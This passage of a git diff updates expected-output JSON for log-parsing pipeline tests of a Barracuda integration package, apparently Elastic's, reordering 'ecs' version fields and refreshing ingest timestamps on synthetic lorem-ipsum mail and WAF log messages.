+ }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Ret Policy Summary (Del:hil Kept:atquovo)", "event": { - "ingested": "2021-06-09T09:46:40.867581400Z" + "ingested": "2021-12-14T14:35:57.048691731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[tatn]: 10.18.109.121 ents pida allow idolor 1 emoeni 269 1.2857 utlabore ecillu", "event": { - "ingested": "2021-06-09T09:46:40.867585800Z" + "ingested": "2021-12-14T14:35:57.048692119Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.19.194.101] global CHANGE orinrepr (conse)", "event": { - "ingested": "2021-06-09T09:46:40.867590300Z" + "ingested": "2021-12-14T14:35:57.048692506Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (lumqui.exe) queued as itinvo", "event": { - "ingested": "2021-06-09T09:46:40.867595600Z" + "ingested": "2021-12-14T14:35:57.048693005Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (usmodt.exe) queued as siar", "event": { - "ingested": "2021-06-09T09:46:40.867648200Z" + "ingested": "2021-12-14T14:35:57.048693400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[sci]: 10.116.193.182 snostrud nama allow data 1 ationul 2530 1.5361 commod adol", "event": { - "ingested": "2021-06-09T09:46:40.867655700Z" + "ingested": "2021-12-14T14:35:57.048693790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: hitect[10.198.6.166] modocon 1486156610 1486156610 SCAN que atevel nsecte itame 0 38 lit5929.test quamnih", "event": { - "ingested": "2021-06-09T09:46:40.867661800Z" + "ingested": "2021-12-14T14:35:57.048694182Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.198.19.111 aquaeabi lita adeseru accept amc 4 amest corp modtemp \u003c\u003crehender\u003e: iae", "event": { - "ingested": "2021-06-09T09:46:40.867666900Z" + "ingested": "2021-12-14T14:35:57.048694560Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: equat[10.77.137.72] ione 1488626519 1488626519 SCAN ihilmole eriamea amre rsita 8 56 uptat3156.www5.test tmo", "event": { - "ingested": "2021-06-09T09:46:40.867672100Z" + "ingested": "2021-12-14T14:35:57.048694948Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: vitaedi[10.128.114.77] temqu 1489861473 1489861473 SCAN edol colab ommodico quatD 4 59 neav6028.internal.domain agnid", "event": { - "ingested": "2021-06-09T09:46:40.867707700Z" + "ingested": "2021-12-14T14:35:57.048695353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.181.80.139 hitecto ents liquide allow tenatu 1 boN eprehend aevit aboN", "event": { - "ingested": "2021-06-09T09:46:40.867714500Z" + "ingested": "2021-12-14T14:35:57.048695738Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ris]: uamqu[10.138.252.123] quioffi 1492331381 1492331381 RECV uptate ncidid quaturve", "event": { - "ingested": "2021-06-09T09:46:40.867719400Z" + "ingested": "2021-12-14T14:35:57.048696145Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (aera.exe) queued as ate", "event": { - "ingested": "2021-06-09T09:46:40.867724900Z" + "ingested": "2021-12-14T14:35:57.048696531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.153.108.27] uir 1494801290 1494801290 RECV dol essecil citation", "event": { - "ingested": "2021-06-09T09:46:40.867729900Z" + "ingested": "2021-12-14T14:35:57.048696923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.120.167.239 gnido ratvolu olup deny nsecte 3 eveli eroi dtemp aliquide", "event": { - "ingested": "2021-06-09T09:46:40.867734800Z" + "ingested": "2021-12-14T14:35:57.048697431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ris]: nisi[10.105.88.20] ecte 1497271198 1497271198 RECV tinvolu iurer iciadese", "event": { - "ingested": "2021-06-09T09:46:40.867741600Z" + "ingested": "2021-12-14T14:35:57.048697822Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: olupta[10.98.92.244] idolor 1498506153 1498506153 deny uta llumdolo nre ercitat 7 38 riosamn SZ:ept SUBJ:iumtotam", "event": { - "ingested": "2021-06-09T09:46:40.867746Z" + "ingested": "2021-12-14T14:35:57.048698219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[sperna]: sintocc[10.185.107.75] tDuisaut 1499741107 1499741107 allow tate imvenia spi stquido 8 62 ptas SZ:pta SUBJ:tetu", "event": { - "ingested": "2021-06-09T09:46:40.867750200Z" + "ingested": "2021-12-14T14:35:57.048698612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (nevo.exe) queued as ide", "event": { - "ingested": "2021-06-09T09:46:40.867754300Z" + "ingested": "2021-12-14T14:35:57.048699017Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[etcons]: 10.80.214.206 ate uiac accept officiad 4 quinesc 6218 1.5651 tur roi", "event": { - "ingested": "2021-06-09T09:46:40.867758400Z" + "ingested": "2021-12-14T14:35:57.048699404Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[nof]: 10.48.34.226 ccaec ten allow isc 2 ntN 6179 1.2364 tateve itinvol", "event": { - "ingested": "2021-06-09T09:46:40.867762500Z" + "ingested": "2021-12-14T14:35:57.048699786Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (etconsec.exe) queued as ios", "event": { - "ingested": "2021-06-09T09:46:40.867766800Z" + "ingested": "2021-12-14T14:35:57.048700180Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: tquov[10.211.93.62] mod 1505915878 1505915878 SCAN hilm ataevi com tnulapa 5 57 tiumt SZ:reetdolo SUBJ:norum", "event": { - "ingested": "2021-06-09T09:46:40.867771Z" + "ingested": "2021-12-14T14:35:57.048700569Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (uidol.exe) queued as mporin", "event": { - "ingested": "2021-06-09T09:46:40.867775Z" + "ingested": "2021-12-14T14:35:57.048700961Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: qui[10.199.182.123] entor 1508385787 1508385787 accept Sedutp utp ema rsitv 0 69 ntiumt iquipe", "event": { - "ingested": "2021-06-09T09:46:40.867779Z" + "ingested": "2021-12-14T14:35:57.048701351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (tvolupt.exe) queued as eufugi", "event": { - "ingested": "2021-06-09T09:46:40.867783100Z" + "ingested": "2021-12-14T14:35:57.048701749Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[pid]: illoin[10.130.38.118] uamni 1510855695 1510855695 block gnamal metMalo ntexplic archite 1 56 untu asi", "event": { - "ingested": "2021-06-09T09:46:40.867787600Z" + "ingested": "2021-12-14T14:35:57.048702146Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.153.152.219] eumiu 1512090649 1512090649 RECV orumSe boree intoc", "event": { - "ingested": "2021-06-09T09:46:40.867791500Z" + "ingested": "2021-12-14T14:35:57.048702533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Retention violating accounts: rnatur total", "event": { - "ingested": "2021-06-09T09:46:40.867795400Z" + "ingested": "2021-12-14T14:35:57.048702929Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (isisten.exe) queued as cusant", "event": { - "ingested": "2021-06-09T09:46:40.867799400Z" + "ingested": "2021-12-14T14:35:57.048703324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (naal.exe) queued as borios", "event": { - "ingested": "2021-06-09T09:46:40.867803600Z" + "ingested": "2021-12-14T14:35:57.048703812Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.167.227.44 tali lillum cusant deny ender 2 oles edic seq tutlab", "event": { - "ingested": "2021-06-09T09:46:40.867807700Z" + "ingested": "2021-12-14T14:35:57.048704198Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[atevelit]: 10.56.136.27 aperia ccaeca deny ttenby 1 amc 5163 1.375 orumSe ratv", "event": { - "ingested": "2021-06-09T09:46:40.867811700Z" + "ingested": "2021-12-14T14:35:57.048704576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.194.90.130] FAILED_LOGIN (siut)", "event": { - "ingested": "2021-06-09T09:46:40.867815600Z" + "ingested": "2021-12-14T14:35:57.048704965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.103.69.44] velitess 1520735329 1520735329 RECV naali uunturm temUte", "event": { - "ingested": "2021-06-09T09:46:40.867819700Z" + "ingested": "2021-12-14T14:35:57.048705357Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: aveni[10.29.155.171] uptatema 1521970284 1521970284 SCAN oeni tdol sit tiaec 6 23 oremagna3521.mail.home asiar", "event": { - "ingested": "2021-06-09T09:46:40.867823800Z" + "ingested": "2021-12-14T14:35:57.048706369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.145.193.93] nonp 1523205238 1523205238 RECV labo ulapar aboreetd", "event": { - "ingested": "2021-06-09T09:46:40.867828Z" + "ingested": "2021-12-14T14:35:57.048706808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[ama]: uatur[10.143.79.226] exeacom 1524440192 1524440192 RECV roidents tem dol", "event": { - "ingested": "2021-06-09T09:46:40.867838300Z" + "ingested": "2021-12-14T14:35:57.048707223Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.30.25.84] FAILED_LOGIN (utlab)", "event": { - "ingested": "2021-06-09T09:46:40.867850200Z" + "ingested": "2021-12-14T14:35:57.048707612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.141.225.182] bor 1526910101 1526910101 RECV rauto ationev 8 57 uaUten", "event": { - "ingested": "2021-06-09T09:46:40.867857200Z" + "ingested": "2021-12-14T14:35:57.048708030Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (dun.exe) queued as reprehe", "event": { - "ingested": "2021-06-09T09:46:40.867862100Z" + "ingested": "2021-12-14T14:35:57.048708405Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.90.9.88] global CHANGE umexerc (oremipsu)", "event": { - "ingested": "2021-06-09T09:46:40.867866400Z" + "ingested": "2021-12-14T14:35:57.048708794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (amco.exe) queued as ssecillu", "event": { - "ingested": "2021-06-09T09:46:40.867870600Z" + "ingested": "2021-12-14T14:35:57.048709185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (olo.exe) queued as psumqu", "event": { - "ingested": "2021-06-09T09:46:40.867903100Z" + "ingested": "2021-12-14T14:35:57.048709575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[rationev]: 10.226.20.199 tatem untutlab allow eveli 2 lillum 7809 1.2000 uisaute imide", "event": { - "ingested": "2021-06-09T09:46:40.867911200Z" + "ingested": "2021-12-14T14:35:57.048709962Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.134.140.191] global CHANGE nte (mvel)", "event": { - "ingested": "2021-06-09T09:46:40.867916600Z" + "ingested": "2021-12-14T14:35:57.048710366Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp[conse]: 10.252.40.172 nimadmin isiu licabo cancel etdolor 3 dic cola amcor", "event": { - "ingested": "2021-06-09T09:46:40.867921100Z" + "ingested": "2021-12-14T14:35:57.048710752Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[xea]: ites[10.126.26.131] nisiut 1536789735 1536789735 accept teturad perspici itation sequatD 5 24 isciv rroqu", "event": { - "ingested": "2021-06-09T09:46:40.867925200Z" + "ingested": "2021-12-14T14:35:57.048711143Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[rExc]: iusmo[10.187.210.173] reetd 1538024689 1538024689 accept ulpa sitam rad loi 2 15 Nequepor SZ:eirure SUBJ:deserun", "event": { - "ingested": "2021-06-09T09:46:40.867929200Z" + "ingested": "2021-12-14T14:35:57.048711531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (orroq.exe) queued as vitaedic", "event": { - "ingested": "2021-06-09T09:46:40.867933200Z" + "ingested": "2021-12-14T14:35:57.048711923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (orem.exe) queued as rcit", "event": { - "ingested": "2021-06-09T09:46:40.867937300Z" + "ingested": "2021-12-14T14:35:57.048712314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[untincul]: ssecil[10.180.147.129] atise 1541729552 1541729552 allow umetMalo oluptas emvele isnost 2 5 ido emqu", "event": { - "ingested": "2021-06-09T09:46:40.867995400Z" + "ingested": "2021-12-14T14:35:57.048712701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[exeaco]: 10.99.17.210 olorsit tore cancel illu 4 turadip 688 1.7484 boreetdo undeom", "event": { - "ingested": "2021-06-09T09:46:40.868003400Z" + "ingested": "2021-12-14T14:35:57.048713083Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[uov]: 10.230.46.162 sBono loremqu accept quunt 3 siuta 1107 1.2607 dquia temporin", "event": { - "ingested": "2021-06-09T09:46:40.868008500Z" + "ingested": "2021-12-14T14:35:57.048713469Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[nimveni]: idi[10.96.135.47] rum 1545434414 1545434414 accept eporroq ulla iqu oin 1 55 cingel modocon", "event": { - "ingested": "2021-06-09T09:46:40.868013300Z" + "ingested": "2021-12-14T14:35:57.048714047Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (atv.exe) queued as onu", "event": { - "ingested": "2021-06-09T09:46:40.868017500Z" + "ingested": "2021-12-14T14:35:57.048714458Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: obeataev[10.139.127.232] nsec 1547904323 1547904323 cancel maperi agnaaliq tlaboree norumet 7 48 tin SZ:fugitse SUBJ:imad", "event": { - "ingested": "2021-06-09T09:46:40.868021900Z" + "ingested": "2021-12-14T14:35:57.048714849Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: inv[10.163.209.70] atu 1549139277 1549139277 SCAN lloin remipsum tempor citatio 0 57 mveniamq SZ:taedict SUBJ:edquian", "event": { - "ingested": "2021-06-09T09:46:40.868025800Z" + "ingested": "2021-12-14T14:35:57.048715241Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (mipsamvo.exe) queued as eiusmod", "event": { - "ingested": "2021-06-09T09:46:40.868044Z" + "ingested": "2021-12-14T14:35:57.048715684Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[avolu]: Except[10.191.7.121] umetMal 1551609186 1551609186 accept sciun metcons itasper uae 2 21 uia iciad", "event": { - "ingested": "2021-06-09T09:46:40.868050500Z" + "ingested": "2021-12-14T14:35:57.048716072Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: [10.157.196.101] gnaa 1552844140 1552844140 RECV mod doei cipitl", "event": { - "ingested": "2021-06-09T09:46:40.868055500Z" + "ingested": "2021-12-14T14:35:57.048716457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.171.72.5] global CHANGE eprehend (asnu)", "event": { - "ingested": "2021-06-09T09:46:40.868059700Z" + "ingested": "2021-12-14T14:35:57.048716844Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: eritatis[10.209.184.60] mquisn 1555314049 1555314049 cancel uto emUte molestia quir 4 18 emip SZ:ver SUBJ:erc", "event": { - "ingested": "2021-06-09T09:46:40.868063300Z" + "ingested": "2021-12-14T14:35:57.048717234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[dolorsit]: archite[10.143.228.97] isqua 1556549003 1556549003 RECV uta emo itq", "event": { - "ingested": "2021-06-09T09:46:40.868067300Z" + "ingested": "2021-12-14T14:35:57.048717621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ntexpl.exe) queued as dunt", "event": { - "ingested": "2021-06-09T09:46:40.868071Z" + "ingested": "2021-12-14T14:35:57.048718007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: plic[10.17.87.79] tetur 1559018911 1559018911 block amali ate idolor ratvolu 7 64 onse olorem", "event": { - "ingested": "2021-06-09T09:46:40.868085300Z" + "ingested": "2021-12-14T14:35:57.048718411Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: [10.163.18.29] FAILED_LOGIN (nim)", "event": { - "ingested": "2021-06-09T09:46:40.868093900Z" + "ingested": "2021-12-14T14:35:57.048718793Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "web: Retention violating accounts: erspi total", "event": { - "ingested": "2021-06-09T09:46:40.868099300Z" + "ingested": "2021-12-14T14:35:57.048719172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (billoi.exe) queued as moles", "event": { - "ingested": "2021-06-09T09:46:40.868105600Z" + "ingested": "2021-12-14T14:35:57.048719556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: taedi[10.17.98.243] etconsec 1563958728 1563958728 cancel ill mporinc onsectet idolo 8 55 docon SZ:mdolore SUBJ:eosquira", "event": { - "ingested": "2021-06-09T09:46:40.868109600Z" + "ingested": "2021-12-14T14:35:57.048719956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (apariatu.exe) queued as lorsita", "event": { - "ingested": "2021-06-09T09:46:40.868113600Z" + "ingested": "2021-12-14T14:35:57.048720334Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ever.exe) queued as tali", "event": { - "ingested": "2021-06-09T09:46:40.868117500Z" + "ingested": "2021-12-14T14:35:57.048720719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1[mipsumqu]: tatio[10.181.247.224] onnu 1567663591 1567663591 RECV olorema aquiof ende", "event": { - "ingested": "2021-06-09T09:46:40.868121300Z" + "ingested": "2021-12-14T14:35:57.048721107Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan[ugitse]: quiineav[10.235.116.121] ventore 1568898545 1568898545 deny obea emp agnaaliq est 0 73 aev SZ:inrepr SUBJ:mol", "event": { - "ingested": "2021-06-09T09:46:40.868125100Z" + "ingested": "2021-12-14T14:35:57.048721548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "outbound/smtp: 10.178.30.158 llit tenimad sitametc allow onproide 2 cillumd riosa Ok: queued as tNe #to#10.1.6.115", "event": { - "ingested": "2021-06-09T09:46:40.868128600Z" + "ingested": "2021-12-14T14:35:57.048721926Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "notify/smtp[rautod]: 10.124.32.120 lapar ritati accept qui 3 mullam 4965 1.4254 meaque uid", "event": { - "ingested": "2021-06-09T09:46:40.868132200Z" + "ingested": "2021-12-14T14:35:57.048722312Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (ataevita.exe) queued as oremqu", "event": { - "ingested": "2021-06-09T09:46:40.868135700Z" + "ingested": "2021-12-14T14:35:57.048722699Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "reports: REPORTS (velitsed.exe) queued as magnaali", "event": { - "ingested": "2021-06-09T09:46:40.868139300Z" + "ingested": "2021-12-14T14:35:57.048723082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inbound/pass1: der[10.77.182.191] enbyCi 1575073317 1575073317 SCAN quameiu diduntu eiusmod itation 8 79 piciatis2460.api.host iusmodt", "event": { - "ingested": "2021-06-09T09:46:40.868142800Z" + "ingested": "2021-12-14T14:35:57.048723467Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scan: iame[10.193.110.71] tiumd 1576308271 1576308271 accept loinve tanimid isnostru nofdeFi 3 5 saqu remips", "event": { - "ingested": "2021-06-09T09:46:40.868149Z" + "ingested": "2021-12-14T14:35:57.048724263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index a360b6c9309..aaf021290fc 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.484974100Z" + "ingested": "2021-12-14T14:35:58.799877518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (nbyCic).", "event": { - "ingested": "2021-06-09T09:46:41.484991300Z" + "ingested": "2021-12-14T14:35:58.799880166Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:tvolup] New attack definition version 1.1000 is available", "event": { - "ingested": "2021-06-09T09:46:41.484997500Z" + "ingested": "2021-12-14T14:35:58.799880578Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485001900Z" + "ingested": "2021-12-14T14:35:58.799880963Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Initializing STM.", "event": { - "ingested": "2021-06-09T09:46:41.485005900Z" + "ingested": "2021-12-14T14:35:58.799881322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #imadm, address=10.16.222.151", "event": { - "ingested": "2021-06-09T09:46:41.485009700Z" + "ingested": "2021-12-14T14:35:58.799881696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:eritqui] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485013300Z" + "ingested": "2021-12-14T14:35:58.799882051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode change: ccusant,epteurs", "event": { - "ingested": "2021-06-09T09:46:41.485016800Z" + "ingested": "2021-12-14T14:35:58.799882426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:modoco] New attack definition version 1.3971 is available", "event": 